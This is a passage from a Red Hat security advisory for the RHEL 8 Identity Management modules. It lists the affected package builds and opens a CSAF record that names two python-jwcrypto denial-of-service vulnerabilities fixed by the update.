| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src | — |
Vendor Fix
fix
Workaround
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for the idm:DL1 and idm:client modules is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments. \n\nSecurity Fix(es):\n\n* JWCrypto: denail of service Via specifically crafted JWE (CVE-2023-6681)\n\n* python-jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:3267",
"url": "https://access.redhat.com/errata/RHSA-2024:3267"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2260843",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260843"
},
{
"category": "external",
"summary": "2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "RHEL-28842",
